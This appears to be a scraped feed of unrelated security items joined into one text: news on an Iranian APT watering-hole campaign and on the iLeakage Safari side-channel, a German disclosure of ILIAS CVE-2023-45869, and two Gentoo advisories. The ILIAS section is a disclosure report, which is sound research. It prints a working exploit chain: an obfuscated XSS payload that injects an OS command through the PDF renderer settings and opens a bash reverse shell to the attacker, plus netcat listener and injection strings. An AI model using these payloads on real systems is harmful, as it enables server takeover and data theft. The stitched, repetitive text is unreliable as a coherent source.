Nation-state hackers are using hybrids to ensnare those in the maritime, shipping, and logistics industries.

A threat actor sponsored by the Islamic Republic of Iran has been using watering-hole attacks, with a new malware downloader and a budding new method of infection, against Mediterranean organizations involved in the maritime, shipping, and logistics sectors.

These latest tactics and tools represent in some ways a continuation, and in other ways an evolution, for the group variously known as Tortoiseshell, Imperial Kitten, TA456, Crimson Sandstorm, and Yellow Liderc, according to a blog post this week from PricewaterhouseCoopers. The Islamic Revolutionary Guard Corps-backed threat actor has previously been recorded using watering holes, phishing domains, highly targeted emails, fake social media accounts, and more, in its globe-spanning espionage campaigns.

**Yellow Liderc's Latest Campaign**

Since 2022, Yellow Liderc has been compromising legitimate websites and using them to insert malicious JavaScript. The JavaScript fingerprints unwitting visitors, capturing details such as their location, device, time of visit, and so on. If a visitor matches a specific profile — in this case, entities along the Mediterranean associated with maritime, logistics, and shipping — they will be served further malware.

The malware in question is "IMAPLoader," a dynamic link library (DLL) written in .NET, which uses email as a means of command-and-control (C2) communication.

This new sample is in most ways similar in function to Yellow Liderc's previous loaders. It distinguishes itself, however, in its advanced method of infection: a technique known as "appdomain manager injection." First demonstrated by a proof-of-concept (PoC) called "GhostLoader" in 2020, hackers or red teamers can use it to circumvent tools designed to detect a DLL or executable being loaded onto a Windows machine.

After slyly injecting itself on a host computer deemed of high value, IMAPLoader communicates with the attackers' Russian-hosted, very American-sounding email addresses — leviblum\[@\]yandex.com and brodyheywood\[@\]yandex — where further payloads lie.

**Yellow Liderc's Tactics and Targets Vary**

Anyone who tries to defend against Yellow Liderc simply by accounting for this method of injection, or this malware, will end up falling short. The group has been known to cycle through and combine various tactics, techniques, and procedures over the years.

"What we've seen more often and most recently is reconnaissance emails," says Joshua Miller, senior threat researcher at Proofpoint. Since 2021, he says, it has used the open source red-team tool GoPhish to insert malicious links into fake newsletters impersonating legitimate organizations. But it's also got more, weirder strategies in its arsenal. In 2021, Proofpoint described an elaborate, yearslong ruse they ran, posing as a woman named Marcella Flores, in order to phish a specific employee at an aerospace company.

Recently, Proofpoint observed a unique cluster within the same APT targeting workers and organizations in the healthcare, technology, and the nuclear division of a European energy company. According to PwC, it remains an ongoing threat not just to all of these industries and regions thus far named, but also the automotive, defense, and IT industries, in places as far and wide as the Middle East, South Asia, and North and South America.

Perhaps the only consistent elements of a Yellow Liderc attack are the minor discrepancies between the email sender, newsletter, or website one expects, and the actual sender or experience they're delivered.

"Look for any unusual network traffic," Miller advises, and pay attention to suspicious emails. "Checking who's sending an email is important. I know that we say that all the time, but it's true and important for this sort of case."

Iran APT Targets the Mediterranean With Watering-Hole Attacks

A group of academics has devised a novel side-channel attack dubbed iLeakage that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser.
"An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using

Data Security / Vulnerability

A group of academics has devised a novel side-channel attack dubbed **iLeakage** that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser.

"An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution," researchers Jason Kim, Stephan van Schaik, Daniel Genkin, and Yuval Yarom said in a new study.

In a practical attack scenario, the weakness could be exploited using a malicious web page to recover Gmail inbox content and even recover passwords that are autofilled by credential managers.

iLeakage, besides being the first case of a Spectre-style speculative execution attack against Apple Silicon CPUs, also works against all third-party web browsers available for iOS and iPadOS owing to Apple's App Store policy that mandates browser vendors to use Safari's WebKit engine.

Apple was notified of the findings on September 12, 2022. The shortcoming impacts all Apple devices released from 2020 that are powered by Apple's A-series and M-series ARM processors.

The crux of the problem is rooted in the fact that malicious JavaScript and WebAssembly embedded in a web page in one browser tab can surreptitiously read the content of a target website when a victim visits the attacker-controlled web page.

This is accomplished by means of a microarchitectural side-channel that can be weaponized by a malicious actor to infer sensitive information through other variables like timing, power consumption, or electromagnetic emanations.

The side channel that forms the basis of the latest attack is a performance optimization mechanism in modern CPUs called speculative execution, which has been the target of several such similar methods since Spectre came to light in 2018.

While speculative execution is designed as a way to yield a performance advantage by using spare processing cycles to execute program instructions in an out-of-order fashion when encountering a conditional branch instruction whose direction depends on preceding instructions whose execution is not completed yet.

The cornerstone of this technique is to make a prediction as to the path that the program will follow, and speculatively execute instructions along the path. When the prediction turns out to be correct, the task is completed quicker than it would have taken otherwise.

But when a misprediction occurs, the results of the speculative execution are abandoned and the processor resumes along the correct path. That said, these erroneous predictions leave behind certain traces in the cache.

Attacks like Spectre involve inducing a CPU to speculatively perform operations that would not occur during correct program execution and which leak the victim's confidential information via the side channel.

In other words, by coercing CPUs into mispredicting sensitive instructions, the idea is to enable an attacker (through a rogue program) to access data associated with a different program (i.e., victim), effectively breaking down isolation protections.

iLeakage not only bypasses hardening measures incorporated by Apple, but also implements a timer-less and architecture-agnostic method that leverages race conditions to distinguish individual cache hits from cache misses when two processes -- each associated with the attacker and the target -- run on the same CPU.

This gadget then forms the basis of a covert channel that ultimately achieves an out-of-bounds read anywhere in the address space of Safari's rendering process, resulting in information leakage.

While chances of this vulnerability being used in practical real-world attacks are unlikely owing to the technical expertise required to pull it off, the research underscores the continued threats posed by hardware vulnerabilities even after all these years.

News of iLeakage comes months after cybersecurity researchers revealed details of a trifecta of side-channel attacks – Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569) – that could be exploited to leak sensitive data from modern CPUs.

It also follows the discovery of RowPress, a variant of the RowHammer attack on DRAM chips and an improvement over BlackSmith that can be used to cause bitflips in adjacent rows, leading to data corruption or theft.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

iLeakage: New Safari Exploit Impacts Apple iPhones and Macs with A and M-Series CPUs

ILIAS 7.25 (2023-09-12) allows any authenticated user to execute arbitrary operating system commands remotely, when a highly privileged account accesses an XSS payload. The injected commands are executed via the exec() function in the execQuoted() method of the ilUtil class (/Services/Utilities/classes/class.ilUtil.php) This allows attackers to inject malicious commands into the system, potentially compromising the integrity, confidentiality, and availability of the ILIAS installation and the underlying operating system.

Vulnerability

Product

Impact

CVE

OS Command Injection

ILIAS

Kritisch

CVE-2023-45869

**Responsible Disclosure**

⚑ 25. Sep. 2023 - Die Sicherheitslücke wurde entdeckt.  
→ 26. Sep. 2023 - Die Sicherheitslücke wurde an ILIAS gemeldet.  
← 29. Sep. 2023 - ILIAS bestätigt den Erhalt des Reports.  
← 06. Okt. 2023 - ILIAS bestätigt, dass die Sicherheitslücke geschlossen wurde.  
← 23. Okt. 2023 - Patched ILIAS-Release: 8.6, 7.26

**1\. Allgemeine Beschreibung**

Die identifizierte Sicherheitslücke wurde in **ILIAS Version7.25 (2023-09-12 Release)** entdeckt.

Es handelt sich um eine sogenannte OS Command Injection Sicherheitslücke. Dies ist eine Sicherheitslücke, bei der von einem Angreifer übermittelte Befehle auf Betriebssystem-Ebene ausgeführt werden können. In diesem Fall ermöglicht die Schwachstelle einem Angreifer Kommandozeilen-Befehle auszuführen.

Ein Benutzer mit Administratorrechten kann Einstellungen für den PDF-Renderer konfigurieren. Ein Angreifer hat in dieser Komponente potenziell die Möglichkeit Systembefehle einzuschleusen, welche die reguläre Befehlsausführung erweitert. Aufgrund fehlender Eingabeüberprüfung ist es möglich, die Befehlskette beliebig zu erweitern.

Eine bekannte Sicherheitslücke (CVE-2022-45915) könnte hierzu hilfreich sein, da dieselbe Komponente betroffen ist. Der entscheidende Unterschied ist, dass für die Übermittlung einer Payload nicht der Pfad zur Binary wkhtmltopdf selbst, sondern Eingabefelder der Options-Parameter vulnerabel sind.

Besonders kritisch macht diese Schwachstelle, dass sie unter Umständen als normaler User ausgenutzt werden kann. Unter "normal" verstehen wir einen User Account mit den voreingestellten Rechten einer aufgesetzten ILIAS Instanz.

Der folgende PoC und die abschließende Klassifizierung bilden das Worst-Case-Szenario ab. Der Angriff erfolgt durch einen Account mit User-Rechten.

**2\. Proof of Concept (PoC)**

 Your browser does not support the video tag.  
Download video? Here.

**3\. Reproduktion der Schwachstelle****3.1 Reproduktionsschritte (Worst-Case)****Vorabhinweis**

Möchten Sie die Schwachstelle nicht mit dem größtmöglichen Impact, sondern auf einfachem Wege als Administrator reproduzieren, überspringen Sie die folgend aufgeführten Schritte und folgen Sie den Anweisungen unter dem Punkt "_3.2 Reproduktionsschritte (als Admin)_".

**Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Erstellen Sie neben dem gegebenen Administrator einen weiteren User Account:

1.  "root" (ein Administrator)
2.  "testuser" (ein normaler User, der Angreifer)

**Schritt 2:**

Aktivieren Sie mit dem Administrator-Account unter Administration > Layout und Navigation > Editor > HTML/Javascript erlauben die Checkbox bei Modules/Portfolio: Portfolioseite.

**Schritt 3:**

Loggen Sie sich mit dem **User Account** "testuser" ein.  
Navigieren Sie auf Persönlicher Arbeitsraum > Portfolio und erstellen Sie ein Portfolio mit einer leeren Seite. Bearbeiten Sie die leere Seite und erstellen Sie das Inhaltselement Text einfügen.

Kopieren Sie die folgende Payload in einen Texteditor Ihrer Wahl. Ersetzen Sie die im Data-Attribut ( data-ip) gegebene IP 123.456.78.910 mit **Ihrer öffentlichen IP** (also die IP-Adresse, welche für eine Verbindung zum Webserver verwendet werden soll – z.B. die Ihres PCs).

<img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

    <img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

Kopieren und fügen Sie die geänderte Payload aus Ihrem Editor in das Textelement auf der Webseite ein und speichern Sie abschließend die Änderung über den Button "Speichern und zurückkehren".

**Schritt 5:**

Führen Sie auf Ihrem PC den folgenden netcat Befehl aus, um über den Port 1234 auf den Verbindungsaufbau mit dem Webserver warten.

nc -nlvp 1234

    nc -nlvp 1234

**Schritt 6:**

Loggen Sie sich **als Administrator** ein und öffnen Sie entweder die zuvor erstellte Portfolioseite des Users "testuser" über einen Direktlink oder über die Portfoliosuche unter Persönlicher Bereich > Portfolio > Portfolios anderer Benutzer.

Die hinterlegte Payload aus Schritt 3 wird beim Aufruf der Portfolioseite direkt ausgeführt. Überprüfen Sie Ihr CLI:

Der Webserver hat eine Verbindung durch eine Reverse Shell mit dem PC aufgebaut. Als potenzieller Angreifer haben Sie mit den Rechten des User www-data Kontrolle über den Webserver, auf dem ILIAS installiert ist.

**Was genau macht die Payload?**

Folgender Befehl wird bei einer Ausführung der OS Command Injection über die Funktion exec() in der Methode execQuoted() der Klasse ilUtil (/Services/Utilities/classes/class.ilUtil.php) gänzlich ausgeführt:

/usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/XXX.XXX.XXX.XXX/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

    /usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

Um die Payload zu verstehen, hilft die Synopsis von wkhtmltopdf:  
wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>

Der CLI-Befehl beginnend mit wkhtmltopdf erscheint mit allen folgenden [GLOBAL OPTION] Parameter bis zu --javascript-delay wie erwartet normal. Die Payload aus Schritt 3 übergibt ab dieser Stelle den Wert 200 für die voranstehende Option und definiert anschließend direkt das [OBJECT] mit der localhost IP als Quelle _(könnte auch eine beliebige URL oder ein existenter Pfad zu einer Datei sein)_. Folgend wird mit /tmp/x.pdf das <output file> bestimmt, welches durch && rm /tmp/x.pdf direkt wieder gelöscht wird _(das Löschen der Datei ist nicht zwingend notwendig)_. Es folgt die Reverse Shell in der Befehlskette, welche mit der IP des Angreifers über den Port 1234 eine Verbindung aufbaut: && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' . Abschließend werden alle nachfolgenden Zeichen des CLI-Befehls mit # auskommentiert.

**3.2 Reproduktionsschritte (als Admin)****Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Loggen Sie sich als Administrator ein.

Navigieren Sie anschließend auf die Seite Administration -> PDF-Erstellung und klicken Sie unter dem Tab Einstellungen auf den Button Konfiguriere Renderer in der Sektion Portfolio / ContentExport.

**Schritt 2:**

Kopieren Sie folgende Payload:

200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

    200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

> Um die erfolgreiche Ausführung einer Injektion simpel überprüfen zu können, wird mit dieser Payload eine Datei "poc.txt" im Verzeichnis "/tmp" auf dem Webserver abgelegt. Siehe Was genau macht die Payload? unter Punkt 3.1 für eine detaillierte Aufschlüsslung technischer Details.

Fügen Sie die kopierte Payload in das Eingabefeld Javascript Verzögerung ein.

**Schritt 3:**

Führen Sie einen PDF-Export über ein beliebiges Modul aus. Zum Beispiel über Portfolio. Erstellen Sie hierzu ein Portfolio und führen Sie einen PDF-Export aus:

**Schritt 4:**

Prüfen Sie auf dem Webserver, ob die Payload erfolgreich ausgeführt wurde:

**Voraussetzungen für die Ausnutzung**

Die Voraussetzungen für den aufgeschlüsselten Worst Case (Punkt 3.1) lauten wie folgt:

*   Ein Angreifer benötigt Zugriff auf einen Account mit mindestens den Rechten eines normalen Users.
*   Die vom Angreifer hinterlegte Payload muss durch eine User-Interaktion eines hoch priviligierten Nutzers (Administrator) über einen Seitenaufruf ausgelöst werden.
*   Die Funktionalität HTML/Javascript erlauben muss für ein beliebiges Modul, für welches ein User Schreibrechte hat, enabled sein.

Sollte die Funktionalität HTML/Javascript erlauben abgeschaltet sein, besteht die Schwachstelle OS Command Injection als solche weiterhin, kann dann aber nur mit Administrationsrechten oder (falls gegeben) durch eine andere XSS Schwachstelle ausgenutzt werden.

**Auswirkungen**

Diese Schwachstelle kann erhebliche Auswirkungen auf die Sicherheit der betroffenen ILIAS-Installation und des zugrunde liegenden Betriebssystem haben. Alle auf dem Server gespeicherten Daten, Dateien und Komponenten, die der Webserver-User mit gegebenen Rechten lesen, schreiben oder ausführen kann, sind potenziell betroffen. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, könnte zudem das System beschädigen oder weitere Angriffe (z.B. auf externe Dienste wie LDAP durch einsehbare Credentials) durchführen.

**Klassifikation**

CVSS: **9.0 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

**Attack Vector (AV): N**  
Es handelt sich um einen Netzwerkangriff. Die verwundbare Komponente ist "aus der Ferne ausnutzbar" und wird als ein Angriff betrachtet, der auf Protokollebene über das Internet stattfindet.

**Attack Complexity (AC): L**  
Besondere Zugangsbedingungen oder mildernde Umstände bestehen nicht. Es MUSS jedoch für eine erfolgreiche Durchführung die Konfiguration "HTML/Javascript erlauben" gesetzt sein. Wenn eine bestimmte Konfiguration für den Erfolg eines Angriffs erforderlich ist, wird die anfällige Komponente nach CVSSv3.1 Spezifikation unter der Annahme bewertet, dass sie sich in dieser Konfiguration befindet.

**Privileges Required (PR): L**  
Der Angreifer benötigt Privilegien, die grundlegende Benutzerfunktionen eines Users bereitstellen.

**User Interaction (UI): R**  
Der platzierte Schadcode muss für einen erfolgreichen Angriff durch eine User-Interaktion eines Administrators ausgeführt werden.

**Scope (S): C**  
Die anfällige Komponente ist die Webanwendung: Die Webanwendung überführt Systembefehle durch Benutzereingaben in eine exec() Funktion. Die betroffene Komponente ist der Webserver: Auf diesen erlangt der Angreifer Zugriff. Es kann sowohl auf das Dateisystem zugegriffen werden, als auch beliebig gespeicherte Daten aus anderen Komponenten (z.B. Datenbanken) extrahiert werden, welche bei normaler Nutzung der Web-Applikation nicht verfügbar sein sollten. Auch können auf dem Server befindliche Programme bzw. Binaries ausgeführt werden.

**Confidentiality (C): H**  
Bei einen erfolgreichen Angriff kommt es zu einem totalen Verlust der Vertraulichkeit. Alle Ressourcen innerhalb der betroffenen Komponente und weiterführend Komponenten des Betriebssystems werden dem Angreifer offengelegt.

**Integrity (I): H**  
Bei einem erfolgreichen Angriff kommt es zu einem totalen Verlust der Integrität. Der Angreifer ist in der Lage, alle geschützten Dateien der betroffenen Komponente und weiterführend Dateien aus Komponenten des Betriebssystems zu verändern.

**Availability (A): H**  
Bei einem erfolgreichen Angriff ist der Angreifer in der Lage, den Zugang zu den Ressourcen der betroffenen Komponente und weiterführend aus Komponenten des Betriebssystems vollständig zu verweigern. Zum Beispiel durch das Löschen von Dateien.

email: contact@rehmeinfosec.de | threema: WTZ4BZN9

CVE-2023-45869: CVE-2023-45869 - Labor - rehme.infosec

Gentoo Linux Security Advisory 202310-16 - A vulnerability has been discovered in unifi where bundled log4j can facilitate a remote code execution Versions greater than or equal to 6.5.55 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Ubiquiti UniFi: remote code execution via bundled log4j  
     Date: October 26, 2023  
     Bugs: #828853  
       ID: 202310-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in unifi where bundled log4j can  
facilitate a remote code execution

Background  
=========  
Ubiquiti UniFi is a Management Controller for Ubiquiti Networks UniFi  
APs.

Affected packages  
================  
Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
net-wireless/unifi  < 6.5.55      >= 6.5.55

Description  
==========  
A bundled version of log4j could facilitate remote code execution.  
Please review the CVE identifier referenced below for details.

Impact  
=====  
An attacker with permission to modify the logging configuration file can  
construct a malicious configuration using a JDBC Appender with a data  
source referencing a JNDI URI which can execute remote code.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Ubiquity UniFi users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/unifi-6.5.55"

References  
=========  
[ 1 ] CVE-2021-4104  
      https://nvd.nist.gov/vuln/detail/CVE-2021-4104  
[ 2 ] CVE-2021-45046  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45046

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-16

Gentoo Linux Security Advisory 202310-15 - A vulnerability has been discovered in usbview where certain users can trigger a privilege escalation. Versions greater than or equal to 2.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: USBView: root privilege escalation via insecure polkit settings  
     Date: October 26, 2023  
     Bugs: #831756  
       ID: 202310-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in usbview where certain users can  
trigger a privilege escalation.

Background  
=========  
USBView is a tool to display the topology of devices on the USB bus.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-admin/usbview  < 2.2         >= 2.2

Description  
==========  
A vulnerability has been discovered in usbview. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
USBView allows some local users (e.g., ones logged in via SSH) to  
execute arbitrary code as root because certain Polkit settings (e.g.,  
allow_any=yes) for pkexec disable the authentication requirement. Code  
execution can, for example, use the --gtk-module option.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All USBView users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/usbview-2.2"

References  
=========  
[ 1 ] CVE-2022-23220  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23220

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-15

